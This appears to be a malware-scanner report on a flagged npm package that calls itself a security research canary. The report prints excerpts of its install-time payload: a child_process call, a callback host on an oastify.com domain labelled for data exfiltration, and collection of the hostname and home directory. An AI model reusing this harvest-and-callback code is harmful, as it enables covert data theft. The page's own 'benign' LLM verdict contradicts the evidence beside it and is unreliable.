// npm package
testing-on-npmjs
Security research canary — vercel
versions
2
maintainers
1
first publish
2026-05-26
publisher
lobo_hunt
tarball
2,611 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-26
// exfil path
what is read → where it shipssteals
- ○ home dir
- ○ system info
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> const { execSync, spawn } = require('child_process');
> // 1. Host for data exfiltration (Reconnaissance)
> const CALLBACK_HOST = 'qzt3b82juki138pb8n4nwg5f0664uvik.oastify.com';
> return execSync(cmd, { timeout: 3000 }).toString().trim();
> hostname: os.hostname(),// publisher campaignby lobo_hunt
3 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 2 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @2.0.6· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 other host(s).
- @2.0.6··AUTO-PUBLISHED·publisher: lobo_huntheuristic 83/100static flags 5llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1dsuspicious-description:security-researchpublisher-multi-name-burst:2osv-flagged:MAL-2026-4356reads-env-varsreads-homedirreads-system-infooast-callback-domainchild-process-spawn
→ No suspicious destination, no remote-exec shape — 1 other host(s).
// NHI intent1 target·mixed harvest patterns·gate: always
